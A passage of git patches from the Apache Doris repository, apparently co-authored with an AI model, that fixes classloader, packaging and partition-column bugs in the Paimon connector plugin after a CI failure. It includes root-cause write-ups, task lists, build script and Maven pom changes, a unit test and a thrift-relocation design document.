Independently fails the build via core detection. Flag as separate +CI-infra issue. + +## Cross-cutting note: verification gating +RC-1/3/4/5 are **classloader/packaging** bugs that pass UTs (single test-JVM classloader) but fail in +the real plugin-zip child-first deployment. After fixing, validation **must** rebuild the plugin zip(s) +and run the docker external paimon suite (`enablePaimonTest=true`) — not UTs alone. + +## Proposed fix order (after sign-off) +1. RC-1 thrift exclude (+catch Throwable) — unblocks ~19 tests incl. all of family D. +2. RC-2 predicate always-serialize — unblocks the 5 JNI-read tests. +3. RC-6 DESC isKey + RC-7 sys-table — small, contained FE fixes. +4. RC-4 OSS jindo-sdk bundle. +5. RC-3 S3A + RC-5 HMS — after the two direction decisions; gate on docker paimon suite. +6. Flag RC-8 + RC-9 to their owners (no code on this branch). diff --git a/plan-doc/task-list-P5-ci-968828-fixes.md b/plan-doc/task-list-P5-ci-968828-fixes.md new file mode 100644 index 00000000000000..3b22f1a4f3a3f9 --- /dev/null +++ b/plan-doc/task-list-P5-ci-968828-fixes.md @@ -0,0 +1,22 @@ +# Task List — CI build 968828 fixes (RCA: plan-doc/reviews/P5-paimon-ci-968828-rca-2026-06-13.md) + +Decisions (2026-06-13): RC-3 + RC-5 → self-contained bundling. Sequence → contained fixes first. + +## Now (contained, independent commits) +- [x] RC-1 — Thrift libthrift classloader split (exclude libthrift+fe-thrift from paimon+hudi plugin-zip; broaden encodeSchemaEvolution catch to Exception|LinkageError) [~19 tests, BLOCKER] +- [x] RC-2 — Predicate not serialized for no-filter JNI scans (always serialize empty predicate list + BE getPredicates null backstop + UT) [5 tests, BLOCKER] +- [x] RC-6 — DESC Key parity (mapFields ConnectorColumn isKey=true + UT) [3 tests, MAJOR] +- [x] RC-7 — Sys-table schema-cache (override getSchemaCacheValue in PluginDrivenSysExternalTable) [3 tests, MAJOR] + +## After (self-contained, direction signed off; gate on docker paimon suite) +- [ ] RC-3 — S3A AWS-SDK static collision (bundle AWS SDK S3 modules into plugin, child-first) [4 tests, BLOCKER] +- [ ] RC-4 — OSS JindoOssFileSystem split [2 tests, BLOCKER] — MOVED here: not a clean pom add. jindo-sdk + (com.aliyun.jindodata, has JindoOssFileSystem) is NOT cleanly maven-available at runtime ver 6.8.2 + (only stale 6.7.7 in .m2; runtime jar is deployed via the jindofs build, not maven). paimon-jindo + gives a NATIVE JindoFileIO/JindoLoader but its HadoopCompliantFileIO may still hit the cast. Needs + focused investigation + docker validation, same gate as RC-3/RC-5. +- [ ] RC-5 — HMS metastore-client reflection split (self-contained version-matched HMS client closure) [1 test, BLOCKER] + +## Out of scope (flag to owners; no code on this branch) +- [ ] RC-8 — hive CTAS strict-mode stale test expectation (hive/auto-partition owner) +- [ ] RC-9 — BE shutdown ASAN teardown segfault (BE/CI-infra owner) From abdb765a15140e82e9009ed9651a18895d91f097 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 07:09:32 +0800 Subject: [PATCH 051/128] =?UTF-8?q?fix:=20FIX-PAIMON-OSS-JINDO-SELFCONTAIN?= =?UTF-8?q?ED=20=E2=80=94=20RC-4=20bundle=20jindofs=20into=20paimon=20plug?= =?UTF-8?q?in=20(CI=20968828)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the connector sets fs.oss.impl=com.aliyun.jindodata.oss.JindoOssFileSystem, but that impl ships only in the thirdparty jindofs jars (packaged by post-build.sh into fe/lib/jindofs, not a maven artifact). The paimon plugin runs child-first, so JindoOssFileSystem resolves from the parent and cannot be cast to the plugin's child-loaded org.apache.hadoop.fs.FileSystem -> "JindoOssFileSystem cannot be cast to FileSystem" -> "Unknown database" on first OSS listing (paimon_base_filesystem, test_paimon_deletion_vector_oss). The maven route is unbuildable (jindo-sdk/jindo-core are bound to an undeclared jindodata repo -> "present but unavailable"; runtime jindofs is 6.10.4, not in maven). Solution: after deploying the connector plugins, copy the jindofs jars (already placed in fe/lib/jindofs by post-build.sh) into the paimon plugin lib so JindoOssFileSystem loads child-first alongside the plugin's own hadoop FileSystem. Naturally gated (no-op unless --jindofs/DISABLE_BUILD_JINDOFS=OFF). CAVEAT (docker-gated, enablePaimonTest=true): jindo-core ships a native lib that binds to one classloader per JVM, so this is safe only while no concurrent non-paimon path loads jindo from fe/lib/jindofs in the same FE process — must be confirmed by the docker paimon suite. Co-Authored-By: Claude Opus 4.8 (1M context) --- build.sh | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/build.sh b/build.sh index acef0765b43baf..205682b39f8dc7 100755 --- a/build.sh +++ b/build.sh @@ -1094,6 +1094,23 @@ if [[ "${BUILD_FE}" -eq 1 ]]; then done unset CONN_PLUGIN_DIR conn_module conn_plugin_target conn_module_dir conn_zip + # RC-4: self-contain the paimon connector plugin for OSS. The connector sets + # fs.oss.impl=com.aliyun.jindodata.oss.JindoOssFileSystem; that impl lives in the jindofs jars, + # which are packaged from thirdparty by post-build.sh into fe/lib/jindofs (NOT a maven artifact). + # The plugin runs child-first, so without its OWN copy JindoOssFileSystem resolves from the parent + # 'app' classloader and cannot be cast to the plugin's child-loaded org.apache.hadoop.fs.FileSystem. + # Copy the jindofs jars into the paimon plugin lib so JindoOssFileSystem loads child-first alongside + # the plugin's own hadoop FileSystem (same self-contained intent as the bundled hadoop-aws/S3A). + # Naturally gated: a no-op unless jindofs was packaged (--jindofs / DISABLE_BUILD_JINDOFS=OFF). + # CAVEAT (docker-gated, enablePaimonTest=true): jindo-core ships a native lib that can bind to only one + # classloader per JVM, so this is safe only while no concurrent non-paimon path loads jindo from + # fe/lib/jindofs in the same FE process. + PAIMON_CONN_LIB="${DORIS_OUTPUT}/fe/plugins/connector/paimon/lib" + if [[ -d "${PAIMON_CONN_LIB}" && -d "${DORIS_OUTPUT}/fe/lib/jindofs" ]]; then + cp -p "${DORIS_OUTPUT}/fe/lib/jindofs/"*.jar "${PAIMON_CONN_LIB}/" 2>/dev/null || true + fi + unset PAIMON_CONN_LIB + if [ "${TARGET_SYSTEM}" = "Darwin" ] || [ "${TARGET_SYSTEM}" = "Linux" ]; then mkdir -p "${DORIS_OUTPUT}/fe/arthas" rm -rf "${DORIS_OUTPUT}/fe/arthas/*" From be66ac4cdc1a279dbb6a3794da6f742b48c5da36 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 07:09:32 +0800 Subject: [PATCH 052/128] =?UTF-8?q?fix:=20FIX-PAIMON-S3A-SDK-SELFCONTAINED?= =?UTF-8?q?=20=E2=80=94=20RC-3=20bundle=20AWS=20SDK=20into=20paimon=20plug?= =?UTF-8?q?in=20(CI=20968828)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: the prior fix (FIX-PAIMON-HADOOP-CLASSLOADER) bundled hadoop-aws into the plugin (S3AFileSystem child-first) but NOT the AWS SDK v2 (hadoop-aws declares it as software.amazon.awssdk:bundle, which fe/pom.xml excludes). So the plugin's S3AInternalAuditConstants. registered an ExecutionAttribute against the single PARENT-loaded sdk-core static, colliding with fe-core's S3A in ExecutionAttribute.ensureUnique() -> ExceptionInInitializerError that permanently poisoned S3A for the whole FE JVM (test_iceberg_jdbc_catalog/statistics/case_sensibility, test_paimon_statistics). Solution: bundle the AWS SDK v2 (software.amazon.awssdk:s3 + apache-client, BOM-managed 2.29.52) into the plugin child-first, so the plugin's S3A registers against its OWN ExecutionAttribute static. s3's compile closure brings sdk-core (ExecutionAttribute); apache-client is explicit (hadoop-aws wires ApacheHttpClient). software.amazon.awssdk stays child-first (not parent-first) — the separate child SDK copy is the point. Verified: rebuilt plugin zip bundles lib/sdk-core-2.29.52.jar containing software/amazon/awssdk/core/interceptor/ExecutionAttribute.class. Runtime S3A read + assumed-role/STS docker-gated (enablePaimonTest=true). Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 28 ++++++++++++++++++--- 1 file changed, 24 insertions(+), 4 deletions(-) diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index 2663dcf4446549..1397d5f87c313a 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -103,15 +103,35 @@ under the License. FileSystem' and poisoned SecurityUtil (FIX-PAIMON-HADOOP-CLASSLOADER). Self-containing the FS impls here (not delegating hadoop to the parent) is the correct end-state: fe-core's hadoop/hive-catalog-shade is removed after full connector migration. Version + exclusions - inherited from fe-core's dependencyManagement (${hadoop.version}; the heavy - software.amazon.awssdk:bundle is excluded there — S3AFileSystem's AWS SDK v2 classes resolve - from the FE parent classpath as a single copy until fe-core sheds hadoop, then they bundle - here too). --> + inherited from fe-core's dependencyManagement (${hadoop.version}). hadoop-aws:3.4.2 declares + its AWS SDK v2 as software.amazon.awssdk:bundle, which fe/pom.xml excludes on the hadoop-aws + dep — so the SDK is bundled here explicitly (below) child-first (RC-3), giving the plugin's S3A + its own ExecutionAttribute static instead of colliding on fe-core's. --> org.apache.hadoop hadoop-aws + + + software.amazon.awssdk + s3 + + + software.amazon.awssdk + apache-client + + + + org.apache.hive + hive-metastore + 2.3.7 + + org.apache.hadoophadoop-common + org.apache.hadoophadoop-hdfs + org.apache.hadoophadoop-mapreduce-client-core + org.apache.hivehive-common + org.apache.hivehive-serde + org.apache.hivehive-shims + org.apache.thriftlibthrift + com.google.guavaguava + com.google.protobufprotobuf-java + org.datanucleusdatanucleus-api-jdo + org.datanucleusdatanucleus-core + org.datanucleusdatanucleus-rdbms + org.datanucleusjavax.jdo + javax.jdojdo-api + org.apache.derbyderby + com.jolboxbonecp + com.zaxxerHikariCP + commons-dbcpcommons-dbcp + commons-poolcommons-pool + org.apache.hbasehbase-client + co.cask.tephratephra-api + co.cask.tephratephra-core + co.cask.tephratephra-hbase-compat-1.0 + ch.qos.logbacklogback-classic + ch.qos.logbacklogback-core + org.slf4jslf4j-log4j12 + commons-loggingcommons-logging + + + org.apache.logging.log4j log4j-api From e3c5f8ac7b534fbc2e91b92bbab1b37c1ce9bcc2 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 07:11:28 +0800 Subject: [PATCH 054/128] docs: mark RC-3/4/5 self-contained classloader fixes done (CI 968828) RC-3 AWS SDK (b5205c41531), RC-5 HMS client (7841830809b), RC-4 jindo via build.sh (e881247857d). Runtime behavior gated on the docker paimon suite (enablePaimonTest=true). Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/task-list-P5-ci-968828-fixes.md | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/plan-doc/task-list-P5-ci-968828-fixes.md b/plan-doc/task-list-P5-ci-968828-fixes.md index 3b22f1a4f3a3f9..cb2426b4b6831b 100644 --- a/plan-doc/task-list-P5-ci-968828-fixes.md +++ b/plan-doc/task-list-P5-ci-968828-fixes.md @@ -8,14 +8,16 @@ Decisions (2026-06-13): RC-3 + RC-5 → self-contained bundling. Sequence → co - [x] RC-6 — DESC Key parity (mapFields ConnectorColumn isKey=true + UT) [3 tests, MAJOR] - [x] RC-7 — Sys-table schema-cache (override getSchemaCacheValue in PluginDrivenSysExternalTable) [3 tests, MAJOR] -## After (self-contained, direction signed off; gate on docker paimon suite) -- [ ] RC-3 — S3A AWS-SDK static collision (bundle AWS SDK S3 modules into plugin, child-first) [4 tests, BLOCKER] -- [ ] RC-4 — OSS JindoOssFileSystem split [2 tests, BLOCKER] — MOVED here: not a clean pom add. jindo-sdk - (com.aliyun.jindodata, has JindoOssFileSystem) is NOT cleanly maven-available at runtime ver 6.8.2 - (only stale 6.7.7 in .m2; runtime jar is deployed via the jindofs build, not maven). paimon-jindo - gives a NATIVE JindoFileIO/JindoLoader but its HadoopCompliantFileIO may still hit the cast. Needs - focused investigation + docker validation, same gate as RC-3/RC-5. -- [ ] RC-5 — HMS metastore-client reflection split (self-contained version-matched HMS client closure) [1 test, BLOCKER] +## Self-contained (committed; runtime behavior gated on docker paimon suite enablePaimonTest=true) +- [x] RC-3 — S3A AWS-SDK static collision: bundle software.amazon.awssdk:s3 + apache-client child-first + (`b5205c41531`). Verified: plugin zip's sdk-core contains its own ExecutionAttribute. Docker-gate: S3 read + STS/assumed-role; plugin uses unpatched SdkDefaultClientBuilder. +- [x] RC-5 — HMS metastore-client reflection split: bundle org.apache.hive:hive-metastore:2.3.7 child-first + with exclusions (`7841830809b`). Verified: 5 getProxy(HiveConf) overloads, 0 fastutil, no hadoop-2.7.2. + Docker-gate: thrift 0.9.3-vs-host-0.16.0 wire skew (real metastore handshake); DLF ProxyMetaStoreClient still uncovered. +- [x] RC-4 — OSS JindoOssFileSystem split: build.sh copies thirdparty jindofs jars into the paimon plugin + lib so JindoOssFileSystem loads child-first (`e881247857d`). Maven route is unbuildable (jindo bound + to undeclared jindodata repo; ver skew 6.7.7/6.9.1/6.10.4). Docker-gate: jindo-core native single-load + (UnsatisfiedLinkError if a concurrent non-paimon path also loads jindo from fe/lib/jindofs). ## Out of scope (flag to owners; no code on this branch) - [ ] RC-8 — hive CTAS strict-mode stale test expectation (hive/auto-partition owner) From ca8250fac9fc9eb912c426be6b08f6172e55f19a Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 14:43:38 +0800 Subject: [PATCH 055/128] =?UTF-8?q?fix:=20FIX-PAIMON-PATH-PARTITION-KEYS?= =?UTF-8?q?=20=E2=80=94=20RC=20partition-column=20double-fill=20BE=20crash?= =?UTF-8?q?=20(CI=20968880)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause (FE behavior change, no BE change): the paimon SPI scan path declared partition columns inconsistently across its two FE channels. The per-split PaimonScanRange.populateRangeParams emits the partition columns as columnsFromPath (so the BE APPENDS them), but the connector never emitted the scan-node-level path_partition_keys property, so PluginDrivenScanNode.getPathPartitionKeys() returned empty -> FileQueryScanNode.initSchemaParams did NOT exclude the partition columns from the file/decode set (num_of_columns_from_file + classifyColumn). Since paimon physically stores partition columns IN the ORC data file, the native OrcReader both DECODED dt/hh from the file AND APPENDED them from columnsFromPath -> a row-count double-fill (dt column rows=2 vs data block rows=1) that aborts the BE via DCHECK(block->rows()==col.column->size()) at vorc_reader.cpp:2638 (native ORC, intermittent under the random force_jni_scanner fuzz). Legacy PaimonScanNode.getPathPartitionKeys() returned [dt,hh] and drove BOTH the file-column exclusion AND the append from one source, so it never double-filled. Solution: emit the path_partition_keys scan-node property (lower-cased partition key names, matching the columnsFromPath keys and the Doris column names) in PaimonScanPlanProvider.getScanNodeProperties when the table is partitioned. This restores the legacy invariant — the BE excludes partition columns from the file decode set and appends them exactly once — for both the native ORC path (excluded from decode + appended from columnsFromPath) and the JNI path (projected out of required_fields + filled by _fill_columns_from_path). Mirrors the hive connector. The BE is unchanged. Tests: PaimonScanPlanProviderTest.getScanNodePropertiesEmitsPathPartitionKeysForPartitionedTable pins that a partitioned paimon table emits path_partition_keys. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 16 +++++++++ .../paimon/PaimonScanPlanProviderTest.java | 36 +++++++++++++++++++ 2 files changed, 52 insertions(+) diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index dc8e7e1586285a..38bc8cbfcf549c 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -524,6 +524,22 @@ public Map getScanNodeProperties( props.put("file_format_type", "jni"); props.put("table_format_type", "paimon"); + // Path partition keys: declare the partition columns at the scan-node level so + // FileQueryScanNode excludes them from the file/decode column set (num_of_columns_from_file + + // classifyColumn -> PARTITION_KEY). Paimon physically stores partition columns IN the data + // file, and the per-split PaimonScanRange.populateRangeParams already emits them as + // columnsFromPath; without this declaration the BE both DECODES dt/hh from the ORC file AND + // APPENDS them from columnsFromPath -> a row-count double-fill that trips the OrcReader DCHECK + // (block rows != partition col rows). Lower-cased to match the Doris column names and the + // columnsFromPath keys (getPartitionInfoMap). Restores legacy PaimonScanNode.getPathPartitionKeys + // parity (and mirrors the hive connector). PluginDrivenScanNode.getPathPartitionKeys reads this. + List partitionKeys = table.partitionKeys(); + if (partitionKeys != null && !partitionKeys.isEmpty()) { + props.put("path_partition_keys", partitionKeys.stream() + .map(k -> k.toLowerCase(Locale.ROOT)) + .collect(Collectors.joining(","))); + } + // Serialized table for BE's JNI reader String serializedTable = encodeObjectToString(table); props.put("paimon.serialized_table", serializedTable); diff --git a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java index b316c06540f2ef..d494008615e0b4 100644 --- a/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java +++ b/fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonScanPlanProviderTest.java @@ -504,6 +504,42 @@ public void getScanNodePropertiesAlwaysEmitsPredicateForNoFilterScan(@TempDir Pa } } + @Test + public void getScanNodePropertiesEmitsPathPartitionKeysForPartitionedTable(@TempDir Path warehouse) + throws Exception { + // RC (CI 968880): a partitioned paimon table must declare path_partition_keys so + // PluginDrivenScanNode.getPathPartitionKeys excludes the partition columns from the file/decode + // set. Paimon stores partition columns IN the data file and the per-split columnsFromPath already + // appends them; without path_partition_keys the BE both DECODES dt from the ORC file AND APPENDS + // it -> a row-count double-fill that aborts the native OrcReader (DCHECK block rows != dt rows). + // MUTATION: dropping the props.put("path_partition_keys", ...) -> the key is absent -> red. + try (Catalog catalog = new FileSystemCatalog(LocalFileIO.create(), + new org.apache.paimon.fs.Path(warehouse.toUri()))) { + catalog.createDatabase("db", false); + Identifier id = Identifier.create("db", "t"); + catalog.createTable(id, Schema.newBuilder() + .column("id", DataTypes.INT()) + .column("dt", DataTypes.STRING()) + .partitionKeys("dt") + .option("bucket", "-1") + .build(), false); + Table base = catalog.getTable(id); + + RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); + PaimonTableHandle handle = new PaimonTableHandle( + "db", "t", Collections.emptyList(), Collections.emptyList()); + handle.setPaimonTable(base); + + PaimonScanPlanProvider provider = new PaimonScanPlanProvider(Collections.emptyMap(), ops); + Map props = provider.getScanNodeProperties( + null, handle, Collections.emptyList(), Optional.empty()); + + Assertions.assertEquals("dt", props.get("path_partition_keys"), + "a partitioned paimon table must declare its partition columns as path_partition_keys " + + "so the BE excludes them from the file decode set (else double-fill -> crash)"); + } + } + @Test public void resolveTableUsesTransientWithoutReload() { RecordingPaimonCatalogOps ops = new RecordingPaimonCatalogOps(); From 71f20eaf25950c9e2709148b23f3cffff791d260 Mon Sep 17 00:00:00 2001 From: morningman Date: Sat, 13 Jun 2026 20:13:40 +0800 Subject: [PATCH 056/128] =?UTF-8?q?fix:=20FIX-PAIMON-S3-TRANSFER-MANAGER?= =?UTF-8?q?=20=E2=80=94=20bundle=20s3-transfer-manager,=20RC=20AWS-SDK=20i?= =?UTF-8?q?nterceptor=20cross-loader=20skew=20(CI=20968994)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit - root cause: plugin bundles hadoop-aws+s3+sdk-core child-first but NOT s3-transfer-manager. The SPI resource software/amazon/awssdk/services/s3/execution.interceptors (+ its ApplyUserAgentInterceptor) lives only in s3-transfer-manager.jar. ChildFirstClassLoader found no child copy and fell back to the PARENT s3-transfer-manager, whose ApplyUserAgentInterceptor implements the PARENT sdk-core ExecutionInterceptor (a different Class than the child's) -> SdkClientException -> S3A broken -> 'no file io for scheme s3' -> 'Unknown database' cascade (swallowed at ExternalCatalog.buildDbForInit:914). - solution: bundle software.amazon.awssdk:s3-transfer-manager child-first (BOM-managed 2.29.52) so the resource + interceptor resolve against the child sdk-core. - fixes Class A: 6 s3 tests (test_paimon_s3/minio/schema_change/char_varchar_type/ full_schema_change/jdbc_catalog) + 18 'Unknown database' collateral. - verified: zip lib/ now bundles s3-transfer-manager-2.29.52.jar; dependency:tree clean. Runtime gate: docker enablePaimonTest=true. Co-Authored-By: Claude Opus 4.8 (1M context) --- fe/fe-connector/fe-connector-paimon/pom.xml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index ab522a4955cff9..8f8d10793ba530 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -131,6 +131,25 @@ under the License. software.amazon.awssdk apache-client + + + software.amazon.awssdk + s3-transfer-manager + + + com.huaweicloud + hadoop-huaweicloud + + + + 4.0.0 + + + org.apache.doris + fe-connector + ${revision} + ../pom.xml + + + fe-connector-paimon-hive-shade + jar + Doris FE Connector - Paimon Hive Shade + + FIX-C (build 968994, Class C — paimon HMS metastore=hive NoClassDefFoundError on + org/apache/thrift/transport/TFramedTransport). Paimon's RetryingMetaStoreClientFactory + reflectively loads HiveMetaStoreClient's constructor signatures, which reference the + thrift-0.9.x package org.apache.thrift.transport.TFramedTransport. The host + libthrift-0.16.0 moved that class to .transport.layered, and the plugin bundles no + libthrift (RC-1 keeps org.apache.thrift parent-first so the doris-gen TSerializer/TBase + 0.16.0 path works) -> the old-package class is unsatisfiable. + + This module shades the paimon-hive + HMS-thrift metastore-client closure and relocates + org.apache.thrift -> org.apache.doris.paimon.shaded.thrift (paimon-private), so the + shaded HiveMetaStoreClient/CachedClientPool reference the relocated TFramedTransport + (supplied by the relocated libthrift 0.9.3 inside this jar) and the host 0.16.0 thrift + namespace is left completely untouched. fe-connector-paimon depends on this shaded + artifact instead of raw paimon-hive-connector-3.1 + hive-metastore + hive-common. + See plan-doc/fix-c-hms-thrift-design.md. + + + + + + org.apache.paimon + paimon-hive-connector-3.1 + ${paimon.version} + + true + + + org.apache.httpcomponents.client5 + httpclient5 + + + org.roaringbitmap + RoaringBitmap + + + org.apache.hive + hive-metastore + + + org.apache.hadoop + hadoop-common + + + org.apache.hadoop + hadoop-hdfs + + + com.fasterxml.jackson.dataformat + jackson-dataformat-yaml + + + + + + + org.apache.hive + hive-metastore + 2.3.7 + + true + + org.apache.hadoophadoop-common + org.apache.hadoophadoop-hdfs + org.apache.hadoophadoop-mapreduce-client-core + org.apache.hivehive-common + org.apache.hivehive-serde + org.apache.hivehive-shims + org.apache.thriftlibthrift + com.google.guavaguava + com.google.protobufprotobuf-java + org.datanucleusdatanucleus-api-jdo + org.datanucleusdatanucleus-core + org.datanucleusdatanucleus-rdbms + org.datanucleusjavax.jdo + javax.jdojdo-api + org.apache.derbyderby + com.jolboxbonecp + com.zaxxerHikariCP + commons-dbcpcommons-dbcp + commons-poolcommons-pool + org.apache.hbasehbase-client + co.cask.tephratephra-api + co.cask.tephratephra-core + co.cask.tephratephra-hbase-compat-1.0 + ch.qos.logbacklogback-classic + ch.qos.logbacklogback-core + org.slf4jslf4j-log4j12 + commons-loggingcommons-logging + + + + + + org.apache.hive + hive-common + ${hive.common.version} + + true + + + + + org.apache.thrift + libthrift + 0.9.3 + + true + + + org.apache.httpcomponents + httpcore + + + org.apache.httpcomponents + httpclient + + + org.slf4j + slf4j-api + + + + + + + + + org.apache.maven.plugins + maven-shade-plugin + + + + shade + + package + + + + + org.apache.hadoop:* + org.apache.paimon:paimon-core + org.apache.paimon:paimon-common + org.apache.paimon:paimon-format + org.slf4j:* + org.apache.logging.log4j:* + com.google.guava:* + com.google.protobuf:* + com.fasterxml.jackson.core:* + com.fasterxml.jackson.dataformat:* + commons-logging:* + org.apache.commons:* + commons-io:* + commons-codec:* + + + + true + ${project.basedir}/target/dependency-reduced-pom.xml + + + *:* + + META-INF/*.SF + META-INF/*.DSA + META-INF/*.RSA + META-INF/maven/** + + META-INF/versions/** + + + + + + org.apache.thrift + org.apache.doris.paimon.shaded.thrift + + + + it.unimi.dsi.fastutil + org.apache.doris.paimon.shaded.fastutil + + + + + + + + + diff --git a/fe/fe-connector/fe-connector-paimon/pom.xml b/fe/fe-connector/fe-connector-paimon/pom.xml index 103f81ac7ba062..122d3696cda851 100644 --- a/fe/fe-connector/fe-connector-paimon/pom.xml +++ b/fe/fe-connector/fe-connector-paimon/pom.xml @@ -69,19 +69,19 @@ under the License. ${paimon.version} - - - org.apache.paimon - paimon-hive-connector-3.1 + + + org.apache.doris + fe-connector-paimon-hive-shade + ${project.version} - - org.apache.hive - hive-common - - - - - org.apache.hive - hive-metastore - 2.3.7 - - org.apache.hadoophadoop-common - org.apache.hadoophadoop-hdfs - org.apache.hadoophadoop-mapreduce-client-core - org.apache.hivehive-common - org.apache.hivehive-serde - org.apache.hivehive-shims - org.apache.thriftlibthrift - com.google.guavaguava - com.google.protobufprotobuf-java - org.datanucleusdatanucleus-api-jdo - org.datanucleusdatanucleus-core - org.datanucleusdatanucleus-rdbms - org.datanucleusjavax.jdo - javax.jdojdo-api - org.apache.derbyderby - com.jolboxbonecp - com.zaxxerHikariCP - commons-dbcpcommons-dbcp - commons-poolcommons-pool - org.apache.hbasehbase-client - co.cask.tephratephra-api - co.cask.tephratephra-core - co.cask.tephratephra-hbase-compat-1.0 - ch.qos.logbacklogback-classic - ch.qos.logbacklogback-core - org.slf4jslf4j-log4j12 - commons-loggingcommons-logging - - - org.apache.logging.log4j log4j-api diff --git a/fe/fe-connector/pom.xml b/fe/fe-connector/pom.xml index e75f30b625d30d..2e1a319a0a6076 100644 --- a/fe/fe-connector/pom.xml +++ b/fe/fe-connector/pom.xml @@ -46,6 +46,9 @@ under the License. fe-connector-jdbc fe-connector-hms fe-connector-hive + + fe-connector-paimon-hive-shade fe-connector-paimon fe-connector-hudi fe-connector-iceberg diff --git a/plan-doc/fix-c-hms-thrift-design.md b/plan-doc/fix-c-hms-thrift-design.md new file mode 100644 index 00000000000000..a5241b620a8315 --- /dev/null +++ b/plan-doc/fix-c-hms-thrift-design.md @@ -0,0 +1,392 @@ +# Problem + +Build 968994 (Class C). Paimon catalogs with `metastore=hive` (HMS-backed) fail at +**catalog create** with: + +``` +java.lang.NoClassDefFoundError: org/apache/thrift/transport/TFramedTransport + at java.lang.Class.getDeclaredConstructors0(Native Method) + at org.apache.paimon.hive.RetryingMetaStoreClientFactory + .constructorDetectedHiveMetastoreProxySupplier(RetryingMetaStoreClientFactory.java:199) + ... HiveClientPool ... CachedClientPool ... +``` + +Affected regression tests (docker `enablePaimonTest=true`): +- `regression-test/.../external_table_p0/paimon/test_paimon_table.groovy` + → `test_create_paimon_table` (line 44), uses a `metastore=hive` paimon catalog. +- `regression-test/.../external_table_p0/paimon/test_paimon_statistics.groovy` (line 33), + same HMS-backed catalog. + +`test_paimon_jdbc_catalog.groovy` uses `metastore=jdbc` and is **not** affected (no Thrift +metastore client involved). + +--- + +# Root Cause + +## The two thrift consumers that share one plugin classloader + +The paimon plugin (`fe/plugins/connector/paimon/lib/*.jar`) is loaded by +`org.apache.doris.common.util.ChildFirstClassLoader`. That loader is **purely child-first +with no parent-first allowlist** (verified — `ChildFirstClassLoader.loadClass` always tries +`findClass` over the plugin jars first for *every* class, and only delegates to the parent on +`ClassNotFoundException`). A class therefore resolves parent-first **only if it is absent from +the plugin lib**. + +Two code paths in the same plugin both want package `org.apache.thrift.*`: + +1. **doris-gen Thrift serialization (RC-1 path).** `PaimonScanPlanProvider` calls + `org.apache.thrift.TSerializer.serialize()` on `TFileScanRangeParams`, which implements the + host fe-thrift **0.16.0** `org.apache.thrift.TBase`. This must resolve **parent-first** + against the host `fe/lib/libthrift-0.16.0.jar` so the `TSerializer`, `TBase`, and the + doris-gen type all come from one loader. RC-1 (commit `f5b787c5f15`) fixed an + `IncompatibleClassChangeError` here by **excluding** `org.apache.thrift:libthrift` from the + plugin (pom exclusion + `plugin-zip.xml` exclude), so `org.apache.thrift.TBase` is absent + from the plugin and falls through to the parent 0.16.0. + +2. **The paimon HMS Thrift metastore client (the failing path).** For `metastore=hive`, + paimon's `org.apache.paimon.hive.RetryingMetaStoreClientFactory` reflectively enumerates + the constructors of `org.apache.hadoop.hive.metastore.HiveMetaStoreClient` + (`Class.getDeclaredConstructors0` at `RetryingMetaStoreClientFactory.java:199`). The bundled + `hive-metastore-2.3.7.jar`'s `HiveMetaStoreClient.class` references the **thrift-0.9.x + package** `org.apache.thrift.transport.TFramedTransport` in its constructor/method + signatures. Resolving those signatures forces the JVM to load `TFramedTransport`. + +## Why TFramedTransport is missing + +- Host `fe/lib/libthrift-0.16.0.jar` moved `TFramedTransport` to a **new package**: + it contains only `org/apache/thrift/transport/layered/TFramedTransport.class`. The + **old** `org/apache/thrift/transport/TFramedTransport.class` is **absent** (verified). +- The plugin lib (verified contents) bundles `paimon-hive-connector-3.1-1.3.1.jar` and + `hive-metastore-2.3.7.jar` (whose `HiveMetaStoreClient.class` references the old-package + `org/apache/thrift/transport/TFramedTransport`) but bundles **no libthrift** at all. +- So `TFramedTransport` is absent from the plugin (→ delegate to parent) **and** absent from + the parent 0.16.0 (moved package) → `NoClassDefFoundError`. + +## Why the current RC-5 bundling does not help, and why the obvious "just add old libthrift" does not work + +The current state (RC-5, `7841830809b`) bundles raw `hive-metastore-2.3.7.jar` + +`hive-common-2.3.9.jar` + raw 